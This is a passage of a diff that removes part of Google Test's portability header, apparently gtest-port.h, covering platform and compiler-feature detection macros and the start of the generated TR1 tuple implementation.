-//   GTEST_CREATE_SHARED_LIBRARY
-//                            - Define to 1 when compiling Google Test itself
-//                              as a shared library.
-
-// Platform-indicating macros
-// --------------------------
-//
-// Macros indicating the platform on which Google Test is being used
-// (a macro is defined to 1 if compiled on the given platform;
-// otherwise UNDEFINED -- it's never defined to 0.).  Google Test
-// defines these macros automatically.  Code outside Google Test MUST
-// NOT define them.
-//
-//   GTEST_OS_AIX      - IBM AIX
-//   GTEST_OS_CYGWIN   - Cygwin
-//   GTEST_OS_FREEBSD  - FreeBSD
-//   GTEST_OS_HPUX     - HP-UX
-//   GTEST_OS_LINUX    - Linux
-//     GTEST_OS_LINUX_ANDROID - Google Android
-//   GTEST_OS_MAC      - Mac OS X
-//     GTEST_OS_IOS    - iOS
-//   GTEST_OS_NACL     - Google Native Client (NaCl)
-//   GTEST_OS_OPENBSD  - OpenBSD
-//   GTEST_OS_QNX      - QNX
-//   GTEST_OS_SOLARIS  - Sun Solaris
-//   GTEST_OS_SYMBIAN  - Symbian
-//   GTEST_OS_WINDOWS  - Windows (Desktop, MinGW, or Mobile)
-//     GTEST_OS_WINDOWS_DESKTOP  - Windows Desktop
-//     GTEST_OS_WINDOWS_MINGW    - MinGW
-//     GTEST_OS_WINDOWS_MOBILE   - Windows Mobile
-//     GTEST_OS_WINDOWS_PHONE    - Windows Phone
-//     GTEST_OS_WINDOWS_RT       - Windows Store App/WinRT
-//   GTEST_OS_ZOS      - z/OS
-//
-// Among the platforms, Cygwin, Linux, Max OS X, and Windows have the
-// most stable support.  Since core members of the Google Test project
-// don't have access to other platforms, support for them may be less
-// stable.  If you notice any problems on your platform, please notify
-// googletestframework@googlegroups.com (patches for fixing them are
-// even more welcome!).
-//
-// It is possible that none of the GTEST_OS_* macros are defined.
-
-// Feature-indicating macros
-// -------------------------
-//
-// Macros indicating which Google Test features are available (a macro
-// is defined to 1 if the corresponding feature is supported;
-// otherwise UNDEFINED -- it's never defined to 0.).  Google Test
-// defines these macros automatically.  Code outside Google Test MUST
-// NOT define them.
-//
-// These macros are public so that portable tests can be written.
-// Such tests typically surround code using a feature with an #if
-// which controls that code.  For example:
-//
-// #if GTEST_HAS_DEATH_TEST
-//   EXPECT_DEATH(DoSomethingDeadly());
-// #endif
-//
-//   GTEST_HAS_COMBINE      - the Combine() function (for value-parameterized
-//                            tests)
-//   GTEST_HAS_DEATH_TEST   - death tests
-//   GTEST_HAS_PARAM_TEST   - value-parameterized tests
-//   GTEST_HAS_TYPED_TEST   - typed tests
-//   GTEST_HAS_TYPED_TEST_P - type-parameterized tests
-//   GTEST_IS_THREADSAFE    - Google Test is thread-safe.
-//   GTEST_USES_POSIX_RE    - enhanced POSIX regex is used. Do not confuse with
-//                            GTEST_HAS_POSIX_RE (see above) which users can
-//                            define themselves.
-//   GTEST_USES_SIMPLE_RE   - our own simple regex is used;
-//                            the above two are mutually exclusive.
-//   GTEST_CAN_COMPARE_NULL - accepts untyped NULL in EXPECT_EQ().
-
-// Misc public macros
-// ------------------
-//
-//   GTEST_FLAG(flag_name)  - references the variable corresponding to
-//                            the given Google Test flag.
-
-// Internal utilities
-// ------------------
-//
-// The following macros and utilities are for Google Test's INTERNAL
-// use only.  Code outside Google Test MUST NOT USE THEM DIRECTLY.
-//
-// Macros for basic C++ coding:
-//   GTEST_AMBIGUOUS_ELSE_BLOCKER_ - for disabling a gcc warning.
-//   GTEST_ATTRIBUTE_UNUSED_  - declares that a class' instances or a
-//                              variable don't have to be used.
-//   GTEST_DISALLOW_ASSIGN_   - disables operator=.
-//   GTEST_DISALLOW_COPY_AND_ASSIGN_ - disables copy ctor and operator=.
-//   GTEST_MUST_USE_RESULT_   - declares that a function's result must be used.
-//   GTEST_INTENTIONAL_CONST_COND_PUSH_ - start code section where MSVC C4127 is
-//                                        suppressed (constant conditional).
-//   GTEST_INTENTIONAL_CONST_COND_POP_  - finish code section where MSVC C4127
-//                                        is suppressed.
-//
-// C++11 feature wrappers:
-//
-//   testing::internal::move  - portability wrapper for std::move.
-//
-// Synchronization:
-//   Mutex, MutexLock, ThreadLocal, GetThreadCount()
-//                            - synchronization primitives.
-//
-// Template meta programming:
-//   is_pointer     - as in TR1; needed on Symbian and IBM XL C/C++ only.
-//   IteratorTraits - partial implementation of std::iterator_traits, which
-//                    is not available in libCstd when compiled with Sun C++.
-//
-// Smart pointers:
-//   scoped_ptr     - as in TR2.
-//
-// Regular expressions:
-//   RE             - a simple regular expression class using the POSIX
-//                    Extended Regular Expression syntax on UNIX-like
-//                    platforms, or a reduced regular exception syntax on
-//                    other platforms, including Windows.
-//
-// Logging:
-//   GTEST_LOG_()   - logs messages at the specified severity level.
-//   LogToStderr()  - directs all log messages to stderr.
-//   FlushInfoLog() - flushes informational log messages.
-//
-// Stdout and stderr capturing:
-//   CaptureStdout()     - starts capturing stdout.
-//   GetCapturedStdout() - stops capturing stdout and returns the captured
-//                         string.
-//   CaptureStderr()     - starts capturing stderr.
-//   GetCapturedStderr() - stops capturing stderr and returns the captured
-//                         string.
-//
-// Integer types:
-//   TypeWithSize   - maps an integer to a int type.
-//   Int32, UInt32, Int64, UInt64, TimeInMillis
-//                  - integers of known sizes.
-//   BiggestInt     - the biggest signed integer type.
-//
-// Command-line utilities:
-//   GTEST_DECLARE_*()  - declares a flag.
-//   GTEST_DEFINE_*()   - defines a flag.
-//   GetInjectableArgvs() - returns the command line as a vector of strings.
-//
-// Environment variable utilities:
-//   GetEnv()             - gets the value of an environment variable.
-//   BoolFromGTestEnv()   - parses a bool environment variable.
-//   Int32FromGTestEnv()  - parses an Int32 environment variable.
-//   StringFromGTestEnv() - parses a string environment variable.
-
-#include <ctype.h>   // for isspace, etc
-#include <stddef.h>  // for ptrdiff_t
-#include <stdlib.h>
-#include <stdio.h>
-#include <string.h>
-#ifndef _WIN32_WCE
-# include <sys/types.h>
-# include <sys/stat.h>
-#endif  // !_WIN32_WCE
-
-#if defined __APPLE__
-# include <AvailabilityMacros.h>
-# include <TargetConditionals.h>
-#endif
-
-#include <algorithm>  // NOLINT
-#include <iostream>  // NOLINT
-#include <sstream>  // NOLINT
-#include <string>  // NOLINT
-#include <utility>
-
-#define GTEST_DEV_EMAIL_ "googletestframework@@googlegroups.com"
-#define GTEST_FLAG_PREFIX_ "gtest_"
-#define GTEST_FLAG_PREFIX_DASH_ "gtest-"
-#define GTEST_FLAG_PREFIX_UPPER_ "GTEST_"
-#define GTEST_NAME_ "Google Test"
-#define GTEST_PROJECT_URL_ "http://code.google.com/p/googletest/"
-
-// Determines the version of gcc that is used to compile this.
-#ifdef __GNUC__
-// 40302 means version 4.3.2.
-# define GTEST_GCC_VER_ \
-    (__GNUC__*10000 + __GNUC_MINOR__*100 + __GNUC_PATCHLEVEL__)
-#endif  // __GNUC__
-
-// Determines the platform on which Google Test is compiled.
-#ifdef __CYGWIN__
-# define GTEST_OS_CYGWIN 1
-#elif defined __SYMBIAN32__
-# define GTEST_OS_SYMBIAN 1
-#elif defined _WIN32
-# define GTEST_OS_WINDOWS 1
-# ifdef _WIN32_WCE
-#  define GTEST_OS_WINDOWS_MOBILE 1
-# elif defined(__MINGW__) || defined(__MINGW32__)
-#  define GTEST_OS_WINDOWS_MINGW 1
-# elif defined(WINAPI_FAMILY)
-#  include <winapifamily.h>
-#  if WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP)
-#   define GTEST_OS_WINDOWS_DESKTOP 1
-#  elif WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_PHONE_APP)
-#   define GTEST_OS_WINDOWS_PHONE 1
-#  elif WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_APP)
-#   define GTEST_OS_WINDOWS_RT 1
-#  else
-    // WINAPI_FAMILY defined but no known partition matched.
-    // Default to desktop.
-#   define GTEST_OS_WINDOWS_DESKTOP 1
-#  endif
-# else
-#  define GTEST_OS_WINDOWS_DESKTOP 1
-# endif  // _WIN32_WCE
-#elif defined __APPLE__
-# define GTEST_OS_MAC 1
-# if TARGET_OS_IPHONE
-#  define GTEST_OS_IOS 1
-# endif
-#elif defined __FreeBSD__
-# define GTEST_OS_FREEBSD 1
-#elif defined __linux__
-# define GTEST_OS_LINUX 1
-# if defined __ANDROID__
-#  define GTEST_OS_LINUX_ANDROID 1
-# endif
-#elif defined __MVS__
-# define GTEST_OS_ZOS 1
-#elif defined(__sun) && defined(__SVR4)
-# define GTEST_OS_SOLARIS 1
-#elif defined(_AIX)
-# define GTEST_OS_AIX 1
-#elif defined(__hpux)
-# define GTEST_OS_HPUX 1
-#elif defined __native_client__
-# define GTEST_OS_NACL 1
-#elif defined __OpenBSD__
-# define GTEST_OS_OPENBSD 1
-#elif defined __QNX__
-# define GTEST_OS_QNX 1
-#endif  // __CYGWIN__
-
-// Macros for disabling Microsoft Visual C++ warnings.
-//
-//   GTEST_DISABLE_MSC_WARNINGS_PUSH_(4800 4385)
-//   /* code that triggers warnings C4800 and C4385 */
-//   GTEST_DISABLE_MSC_WARNINGS_POP_()
-#if _MSC_VER >= 1500
-# define GTEST_DISABLE_MSC_WARNINGS_PUSH_(warnings) \
-    __pragma(warning(push))                        \
-    __pragma(warning(disable: warnings))
-# define GTEST_DISABLE_MSC_WARNINGS_POP_()          \
-    __pragma(warning(pop))
-#else
-// Older versions of MSVC don't have __pragma.
-# define GTEST_DISABLE_MSC_WARNINGS_PUSH_(warnings)
-# define GTEST_DISABLE_MSC_WARNINGS_POP_()
-#endif
-
-#ifndef GTEST_LANG_CXX11
-// gcc and clang define __GXX_EXPERIMENTAL_CXX0X__ when
-// -std={c,gnu}++{0x,11} is passed.  The C++11 standard specifies a
-// value for __cplusplus, and recent versions of clang, gcc, and
-// probably other compilers set that too in C++11 mode.
-# if __GXX_EXPERIMENTAL_CXX0X__ || __cplusplus >= 201103L
-// Compiling in at least C++11 mode.
-#  define GTEST_LANG_CXX11 1
-# else
-#  define GTEST_LANG_CXX11 0
-# endif
-#endif
-
-// Distinct from C++11 language support, some environments don't provide
-// proper C++11 library support. Notably, it's possible to build in
-// C++11 mode when targeting Mac OS X 10.6, which has an old libstdc++
-// with no C++11 support.
-//
-// libstdc++ has sufficient C++11 support as of GCC 4.6.0, __GLIBCXX__
-// 20110325, but maintenance releases in the 4.4 and 4.5 series followed
-// this date, so check for those versions by their date stamps.
-// https://gcc.gnu.org/onlinedocs/libstdc++/manual/abi.html#abi.versioning
-#if GTEST_LANG_CXX11 && \
-    (!defined(__GLIBCXX__) || ( \
-        __GLIBCXX__ >= 20110325ul &&  /* GCC >= 4.6.0 */ \
-        /* Blacklist of patch releases of older branches: */ \
-        __GLIBCXX__ != 20110416ul &&  /* GCC 4.4.6 */ \
-        __GLIBCXX__ != 20120313ul &&  /* GCC 4.4.7 */ \
-        __GLIBCXX__ != 20110428ul &&  /* GCC 4.5.3 */ \
-        __GLIBCXX__ != 20120702ul))   /* GCC 4.5.4 */
-# define GTEST_STDLIB_CXX11 1
-#endif
-
-// Only use C++11 library features if the library provides them.
-#if GTEST_STDLIB_CXX11
-# define GTEST_HAS_STD_BEGIN_AND_END_ 1
-# define GTEST_HAS_STD_FORWARD_LIST_ 1
-# define GTEST_HAS_STD_FUNCTION_ 1
-# define GTEST_HAS_STD_INITIALIZER_LIST_ 1
-# define GTEST_HAS_STD_MOVE_ 1
-# define GTEST_HAS_STD_UNIQUE_PTR_ 1
-#endif
-
-// C++11 specifies that <tuple> provides std::tuple.
-// Some platforms still might not have it, however.
-#if GTEST_LANG_CXX11
-# define GTEST_HAS_STD_TUPLE_ 1
-# if defined(__clang__)
-// Inspired by http://clang.llvm.org/docs/LanguageExtensions.html#__has_include
-#  if defined(__has_include) && !__has_include(<tuple>)
-#   undef GTEST_HAS_STD_TUPLE_
-#  endif
-# elif defined(_MSC_VER)
-// Inspired by boost/config/stdlib/dinkumware.hpp
-#  if defined(_CPPLIB_VER) && _CPPLIB_VER < 520
-#   undef GTEST_HAS_STD_TUPLE_
-#  endif
-# elif defined(__GLIBCXX__)
-// Inspired by boost/config/stdlib/libstdcpp3.hpp,
-// http://gcc.gnu.org/gcc-4.2/changes.html and
-// http://gcc.gnu.org/onlinedocs/libstdc++/manual/bk01pt01ch01.html#manual.intro.status.standard.200x
-#  if __GNUC__ < 4 || (__GNUC__ == 4 && __GNUC_MINOR__ < 2)
-#   undef GTEST_HAS_STD_TUPLE_
-#  endif
-# endif
-#endif
-
-// Brings in definitions for functions used in the testing::internal::posix
-// namespace (read, write, close, chdir, isatty, stat). We do not currently
-// use them on Windows Mobile.
-#if GTEST_OS_WINDOWS
-# if !GTEST_OS_WINDOWS_MOBILE
-#  include <direct.h>
-#  include <io.h>
-# endif
-// In order to avoid having to include <windows.h>, use forward declaration
-// assuming CRITICAL_SECTION is a typedef of _RTL_CRITICAL_SECTION.
-// This assumption is verified by
-// WindowsTypesTest.CRITICAL_SECTIONIs_RTL_CRITICAL_SECTION.
-struct _RTL_CRITICAL_SECTION;
-#else
-// This assumes that non-Windows OSes provide unistd.h. For OSes where this
-// is not the case, we need to include headers that provide the functions
-// mentioned above.
-# include <unistd.h>
-# include <strings.h>
-#endif  // GTEST_OS_WINDOWS
-
-#if GTEST_OS_LINUX_ANDROID
-// Used to define __ANDROID_API__ matching the target NDK API level.
-#  include <android/api-level.h>  // NOLINT
-#endif
-
-// Defines this to true iff Google Test can use POSIX regular expressions.
-#ifndef GTEST_HAS_POSIX_RE
-# if GTEST_OS_LINUX_ANDROID
-// On Android, <regex.h> is only available starting with Gingerbread.
-#  define GTEST_HAS_POSIX_RE (__ANDROID_API__ >= 9)
-# else
-#  define GTEST_HAS_POSIX_RE (!GTEST_OS_WINDOWS)
-# endif
-#endif
-
-#if GTEST_HAS_POSIX_RE
-
-// On some platforms, <regex.h> needs someone to define size_t, and
-// won't compile otherwise.  We can #include it here as we already
-// included <stdlib.h>, which is guaranteed to define size_t through
-// <stddef.h>.
-# include <regex.h>  // NOLINT
-
-# define GTEST_USES_POSIX_RE 1
-
-#elif GTEST_OS_WINDOWS
-
-// <regex.h> is not available on Windows.  Use our own simple regex
-// implementation instead.
-# define GTEST_USES_SIMPLE_RE 1
-
-#else
-
-// <regex.h> may not be available on this platform.  Use our own
-// simple regex implementation instead.
-# define GTEST_USES_SIMPLE_RE 1
-
-#endif  // GTEST_HAS_POSIX_RE
-
-#ifndef GTEST_HAS_EXCEPTIONS
-// The user didn't tell us whether exceptions are enabled, so we need
-// to figure it out.
-# if defined(_MSC_VER) || defined(__BORLANDC__)
-// MSVC's and C++Builder's implementations of the STL use the _HAS_EXCEPTIONS
-// macro to enable exceptions, so we'll do the same.
-// Assumes that exceptions are enabled by default.
-#  ifndef _HAS_EXCEPTIONS
-#   define _HAS_EXCEPTIONS 1
-#  endif  // _HAS_EXCEPTIONS
-#  define GTEST_HAS_EXCEPTIONS _HAS_EXCEPTIONS
-# elif defined(__clang__)
-// clang defines __EXCEPTIONS iff exceptions are enabled before clang 220714,
-// but iff cleanups are enabled after that. In Obj-C++ files, there can be
-// cleanups for ObjC exceptions which also need cleanups, even if C++ exceptions
-// are disabled. clang has __has_feature(cxx_exceptions) which checks for C++
-// exceptions starting at clang r206352, but which checked for cleanups prior to
-// that. To reliably check for C++ exception availability with clang, check for
-// __EXCEPTIONS && __has_feature(cxx_exceptions).
-#  define GTEST_HAS_EXCEPTIONS (__EXCEPTIONS && __has_feature(cxx_exceptions))
-# elif defined(__GNUC__) && __EXCEPTIONS
-// gcc defines __EXCEPTIONS to 1 iff exceptions are enabled.
-#  define GTEST_HAS_EXCEPTIONS 1
-# elif defined(__SUNPRO_CC)
-// Sun Pro CC supports exceptions.  However, there is no compile-time way of
-// detecting whether they are enabled or not.  Therefore, we assume that
-// they are enabled unless the user tells us otherwise.
-#  define GTEST_HAS_EXCEPTIONS 1
-# elif defined(__IBMCPP__) && __EXCEPTIONS
-// xlC defines __EXCEPTIONS to 1 iff exceptions are enabled.
-#  define GTEST_HAS_EXCEPTIONS 1
-# elif defined(__HP_aCC)
-// Exception handling is in effect by default in HP aCC compiler. It has to
-// be turned of by +noeh compiler option if desired.
-#  define GTEST_HAS_EXCEPTIONS 1
-# else
-// For other compilers, we assume exceptions are disabled to be
-// conservative.
-#  define GTEST_HAS_EXCEPTIONS 0
-# endif  // defined(_MSC_VER) || defined(__BORLANDC__)
-#endif  // GTEST_HAS_EXCEPTIONS
-
-#if !defined(GTEST_HAS_STD_STRING)
-// Even though we don't use this macro any longer, we keep it in case
-// some clients still depend on it.
-# define GTEST_HAS_STD_STRING 1
-#elif !GTEST_HAS_STD_STRING
-// The user told us that ::std::string isn't available.
-# error "Google Test cannot be used where ::std::string isn't available."
-#endif  // !defined(GTEST_HAS_STD_STRING)
-
-#ifndef GTEST_HAS_GLOBAL_STRING
-// The user didn't tell us whether ::string is available, so we need
-// to figure it out.
-
-# define GTEST_HAS_GLOBAL_STRING 0
-
-#endif  // GTEST_HAS_GLOBAL_STRING
-
-#ifndef GTEST_HAS_STD_WSTRING
-// The user didn't tell us whether ::std::wstring is available, so we need
-// to figure it out.
-// TODO(wan@google.com): uses autoconf to detect whether ::std::wstring
-//   is available.
-
-// Cygwin 1.7 and below doesn't support ::std::wstring.
-// Solaris' libc++ doesn't support it either.  Android has
-// no support for it at least as recent as Froyo (2.2).
-# define GTEST_HAS_STD_WSTRING \
-    (!(GTEST_OS_LINUX_ANDROID || GTEST_OS_CYGWIN || GTEST_OS_SOLARIS))
-
-#endif  // GTEST_HAS_STD_WSTRING
-
-#ifndef GTEST_HAS_GLOBAL_WSTRING
-// The user didn't tell us whether ::wstring is available, so we need
-// to figure it out.
-# define GTEST_HAS_GLOBAL_WSTRING \
-    (GTEST_HAS_STD_WSTRING && GTEST_HAS_GLOBAL_STRING)
-#endif  // GTEST_HAS_GLOBAL_WSTRING
-
-// Determines whether RTTI is available.
-#ifndef GTEST_HAS_RTTI
-// The user didn't tell us whether RTTI is enabled, so we need to
-// figure it out.
-
-# ifdef _MSC_VER
-
-#  ifdef _CPPRTTI  // MSVC defines this macro iff RTTI is enabled.
-#   define GTEST_HAS_RTTI 1
-#  else
-#   define GTEST_HAS_RTTI 0
-#  endif
-
-// Starting with version 4.3.2, gcc defines __GXX_RTTI iff RTTI is enabled.
-# elif defined(__GNUC__) && (GTEST_GCC_VER_ >= 40302)
-
-#  ifdef __GXX_RTTI
-// When building against STLport with the Android NDK and with
-// -frtti -fno-exceptions, the build fails at link time with undefined
-// references to __cxa_bad_typeid. Note sure if STL or toolchain bug,
-// so disable RTTI when detected.
-#   if GTEST_OS_LINUX_ANDROID && defined(_STLPORT_MAJOR) && \
-       !defined(__EXCEPTIONS)
-#    define GTEST_HAS_RTTI 0
-#   else
-#    define GTEST_HAS_RTTI 1
-#   endif  // GTEST_OS_LINUX_ANDROID && __STLPORT_MAJOR && !__EXCEPTIONS
-#  else
-#   define GTEST_HAS_RTTI 0
-#  endif  // __GXX_RTTI
-
-// Clang defines __GXX_RTTI starting with version 3.0, but its manual recommends
-// using has_feature instead. has_feature(cxx_rtti) is supported since 2.7, the
-// first version with C++ support.
-# elif defined(__clang__)
-
-#  define GTEST_HAS_RTTI __has_feature(cxx_rtti)
-
-// Starting with version 9.0 IBM Visual Age defines __RTTI_ALL__ to 1 if
-// both the typeid and dynamic_cast features are present.
-# elif defined(__IBMCPP__) && (__IBMCPP__ >= 900)
-
-#  ifdef __RTTI_ALL__
-#   define GTEST_HAS_RTTI 1
-#  else
-#   define GTEST_HAS_RTTI 0
-#  endif
-
-# else
-
-// For all other compilers, we assume RTTI is enabled.
-#  define GTEST_HAS_RTTI 1
-
-# endif  // _MSC_VER
-
-#endif  // GTEST_HAS_RTTI
-
-// It's this header's responsibility to #include <typeinfo> when RTTI
-// is enabled.
-#if GTEST_HAS_RTTI
-# include <typeinfo>
-#endif
-
-// Determines whether Google Test can use the pthreads library.
-#ifndef GTEST_HAS_PTHREAD
-// The user didn't tell us explicitly, so we make reasonable assumptions about
-// which platforms have pthreads support.
-//
-// To disable threading support in Google Test, add -DGTEST_HAS_PTHREAD=0
-// to your compiler flags.
-# define GTEST_HAS_PTHREAD (GTEST_OS_LINUX || GTEST_OS_MAC || GTEST_OS_HPUX \
-    || GTEST_OS_QNX || GTEST_OS_FREEBSD || GTEST_OS_NACL)
-#endif  // GTEST_HAS_PTHREAD
-
-#if GTEST_HAS_PTHREAD
-// gtest-port.h guarantees to #include <pthread.h> when GTEST_HAS_PTHREAD is
-// true.
-# include <pthread.h>  // NOLINT
-
-// For timespec and nanosleep, used below.
-# include <time.h>  // NOLINT
-#endif
-
-// Determines whether Google Test can use tr1/tuple.  You can define
-// this macro to 0 to prevent Google Test from using tuple (any
-// feature depending on tuple with be disabled in this mode).
-#ifndef GTEST_HAS_TR1_TUPLE
-# if GTEST_OS_LINUX_ANDROID && defined(_STLPORT_MAJOR)
-// STLport, provided with the Android NDK, has neither <tr1/tuple> or <tuple>.
-#  define GTEST_HAS_TR1_TUPLE 0
-# else
-// The user didn't tell us not to do it, so we assume it's OK.
-#  define GTEST_HAS_TR1_TUPLE 1
-# endif
-#endif  // GTEST_HAS_TR1_TUPLE
-
-// Determines whether Google Test's own tr1 tuple implementation
-// should be used.
-#ifndef GTEST_USE_OWN_TR1_TUPLE
-// The user didn't tell us, so we need to figure it out.
-
-// We use our own TR1 tuple if we aren't sure the user has an
-// implementation of it already.  At this time, libstdc++ 4.0.0+ and
-// MSVC 2010 are the only mainstream standard libraries that come
-// with a TR1 tuple implementation.  NVIDIA's CUDA NVCC compiler
-// pretends to be GCC by defining __GNUC__ and friends, but cannot
-// compile GCC's tuple implementation.  MSVC 2008 (9.0) provides TR1
-// tuple in a 323 MB Feature Pack download, which we cannot assume the
-// user has.  QNX's QCC compiler is a modified GCC but it doesn't
-// support TR1 tuple.  libc++ only provides std::tuple, in C++11 mode,
-// and it can be used with some compilers that define __GNUC__.
-# if (defined(__GNUC__) && !defined(__CUDACC__) && (GTEST_GCC_VER_ >= 40000) \
-      && !GTEST_OS_QNX && !defined(_LIBCPP_VERSION)) || _MSC_VER >= 1600
-#  define GTEST_ENV_HAS_TR1_TUPLE_ 1
-# endif
-
-// C++11 specifies that <tuple> provides std::tuple. Use that if gtest is used
-// in C++11 mode and libstdc++ isn't very old (binaries targeting OS X 10.6
-// can build with clang but need to use gcc4.2's libstdc++).
-# if GTEST_LANG_CXX11 && (!defined(__GLIBCXX__) || __GLIBCXX__ > 20110325)
-#  define GTEST_ENV_HAS_STD_TUPLE_ 1
-# endif
-
-# if GTEST_ENV_HAS_TR1_TUPLE_ || GTEST_ENV_HAS_STD_TUPLE_
-#  define GTEST_USE_OWN_TR1_TUPLE 0
-# else
-#  define GTEST_USE_OWN_TR1_TUPLE 1
-# endif
-
-#endif  // GTEST_USE_OWN_TR1_TUPLE
-
-// To avoid conditional compilation everywhere, we make it
-// gtest-port.h's responsibility to #include the header implementing
-// tuple.
-#if GTEST_HAS_STD_TUPLE_
-# include <tuple>  // IWYU pragma: export
-# define GTEST_TUPLE_NAMESPACE_ ::std
-#endif  // GTEST_HAS_STD_TUPLE_
-
-// We include tr1::tuple even if std::tuple is available to define printers for
-// them.
-#if GTEST_HAS_TR1_TUPLE
-# ifndef GTEST_TUPLE_NAMESPACE_
-#  define GTEST_TUPLE_NAMESPACE_ ::std::tr1
-# endif  // GTEST_TUPLE_NAMESPACE_
-
-# if GTEST_USE_OWN_TR1_TUPLE
-// This file was GENERATED by command:
-//     pump.py gtest-tuple.h.pump
-// DO NOT EDIT BY HAND!!!
-
-// Copyright 2009 Google Inc.
-// All Rights Reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan)
-
-// Implements a subset of TR1 tuple needed by Google Test and Google Mock.
-
-#ifndef GTEST_INCLUDE_GTEST_INTERNAL_GTEST_TUPLE_H_
-#define GTEST_INCLUDE_GTEST_INTERNAL_GTEST_TUPLE_H_
-
-#include <utility>  // For ::std::pair.
-
-// The compiler used in Symbian has a bug that prevents us from declaring the
-// tuple template as a friend (it complains that tuple is redefined).  This
-// hack bypasses the bug by declaring the members that should otherwise be
-// private as public.
-// Sun Studio versions < 12 also have the above bug.
-#if defined(__SYMBIAN32__) || (defined(__SUNPRO_CC) && __SUNPRO_CC < 0x590)
-# define GTEST_DECLARE_TUPLE_AS_FRIEND_ public:
-#else
-# define GTEST_DECLARE_TUPLE_AS_FRIEND_ \
-    template <GTEST_10_TYPENAMES_(U)> friend class tuple; \
-   private:
-#endif
-
-// Visual Studio 2010, 2012, and 2013 define symbols in std::tr1 that conflict
-// with our own definitions. Therefore using our own tuple does not work on
-// those compilers.
-#if defined(_MSC_VER) && _MSC_VER >= 1600  /* 1600 is Visual Studio 2010 */
-# error "gtest's tuple doesn't compile on Visual Studio 2010 or later. \
-GTEST_USE_OWN_TR1_TUPLE must be set to 0 on those compilers."
-#endif
-
-// GTEST_n_TUPLE_(T) is the type of an n-tuple.
-#define GTEST_0_TUPLE_(T) tuple<>
-#define GTEST_1_TUPLE_(T) tuple<T##0, void, void, void, void, void, void, \
-    void, void, void>
-#define GTEST_2_TUPLE_(T) tuple<T##0, T##1, void, void, void, void, void, \
-    void, void, void>
-#define GTEST_3_TUPLE_(T) tuple<T##0, T##1, T##2, void, void, void, void, \
-    void, void, void>
-#define GTEST_4_TUPLE_(T) tuple<T##0, T##1, T##2, T##3, void, void, void, \
-    void, void, void>
-#define GTEST_5_TUPLE_(T) tuple<T##0, T##1, T##2, T##3, T##4, void, void, \
-    void, void, void>
-#define GTEST_6_TUPLE_(T) tuple<T##0, T##1, T##2, T##3, T##4, T##5, void, \
-    void, void, void>
-#define GTEST_7_TUPLE_(T) tuple<T##0, T##1, T##2, T##3, T##4, T##5, T##6, \
-    void, void, void>
-#define GTEST_8_TUPLE_(T) tuple<T##0, T##1, T##2, T##3, T##4, T##5, T##6, \
-    T##7, void, void>
-#define GTEST_9_TUPLE_(T) tuple<T##0, T##1, T##2, T##3, T##4, T##5, T##6, \
-    T##7, T##8, void>
-#define GTEST_10_TUPLE_(T) tuple<T##0, T##1, T##2, T##3, T##4, T##5, T##6, \
-    T##7, T##8, T##9>
-
-// GTEST_n_TYPENAMES_(T) declares a list of n typenames.
-#define GTEST_0_TYPENAMES_(T)
-#define GTEST_1_TYPENAMES_(T) typename T##0
-#define GTEST_2_TYPENAMES_(T) typename T##0, typename T##1
-#define GTEST_3_TYPENAMES_(T) typename T##0, typename T##1, typename T##2
-#define GTEST_4_TYPENAMES_(T) typename T##0, typename T##1, typename T##2, \
-    typename T##3
-#define GTEST_5_TYPENAMES_(T) typename T##0, typename T##1, typename T##2, \
-    typename T##3, typename T##4
-#define GTEST_6_TYPENAMES_(T) typename T##0, typename T##1, typename T##2, \
-    typename T##3, typename T##4, typename T##5
-#define GTEST_7_TYPENAMES_(T) typename T##0, typename T##1, typename T##2, \
-    typename T##3, typename T##4, typename T##5, typename T##6
-#define GTEST_8_TYPENAMES_(T) typename T##0, typename T##1, typename T##2, \
-    typename T##3, typename T##4, typename T##5, typename T##6, typename T##7
-#define GTEST_9_TYPENAMES_(T) typename T##0, typename T##1, typename T##2, \
-    typename T##3, typename T##4, typename T##5, typename T##6, \
-    typename T##7, typename T##8
-#define GTEST_10_TYPENAMES_(T) typename T##0, typename T##1, typename T##2, \
-    typename T##3, typename T##4, typename T##5, typename T##6, \
-    typename T##7, typename T##8, typename T##9
-
-// In theory, defining stuff in the ::std namespace is undefined
-// behavior.  We can do this as we are playing the role of a standard
-// library vendor.
-namespace std {
-namespace tr1 {
-
-template <typename T0 = void, typename T1 = void, typename T2 = void,
-    typename T3 = void, typename T4 = void, typename T5 = void,
-    typename T6 = void, typename T7 = void, typename T8 = void,
-    typename T9 = void>
-class tuple;
-
-// Anything in namespace gtest_internal is Google Test's INTERNAL
-// IMPLEMENTATION DETAIL and MUST NOT BE USED DIRECTLY in user code.
-namespace gtest_internal {
-
-// ByRef<T>::type is T if T is a reference; otherwise it's const T&.
-template <typename T>
-struct ByRef { typedef const T& type; };  // NOLINT
-template <typename T>
-struct ByRef<T&> { typedef T& type; };  // NOLINT
-
-// A handy wrapper for ByRef.
